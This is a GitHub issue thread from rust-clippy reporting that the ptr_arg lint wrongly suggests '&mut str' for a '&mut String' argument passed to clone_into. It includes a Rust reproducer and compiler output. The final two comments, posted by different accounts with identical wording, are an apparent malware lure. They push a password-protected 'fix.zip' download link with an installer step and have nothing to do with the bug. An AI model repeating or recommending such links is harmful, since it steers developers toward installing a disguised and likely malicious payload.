### ISSUE TITLE
ptr_arg triggers on &mut String despite clone_into

### ISSUE THREAD

**Issue by ronnodas** [rust-lang/rust-clippy#13308]
### Summary

If a `&mut String` argument is only used as the input to `clone_into`, then `ptr_arg` triggers erroneously.

### Lint Name

ptr_arg

### Reproducer

I tried this code:

```rust
fn foo(source: &str, destination: &mut String)  {
    source.clone_into(destination)
}

fn main() {
    foo("bar", &mut String::new());
}
```

I saw this happen:

```
warning: writing `&mut String` instead of `&mut str` involves a new object where a slice will do
 --> src/main.rs:1:35
  |
1 | fn foo(source: &str, destination: &mut String)  {
  |                                   ^^^^^^^^^^^ help: change this to: `&mut str`
  |
  = help: for further information visit https://rust-lang.github.io/rust-clippy/master/index.html#ptr_arg
  = note: `#[warn(clippy::ptr_arg)]` on by default
```

I expected to see this happen:

Nothing

### Version

```text
rustc 1.80.1 (3f5fd8dd4 2024-08-06)
binary: rustc
commit-hash: 3f5fd8dd41153bc5fdca9427e9e05be2c767ba23
commit-date: 2024-08-06
host: x86_64-unknown-linux-gnu
release: 1.80.1
LLVM version: 18.1.7
```

### Additional Labels

@rustbot label +I-suggestion-causes-error

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
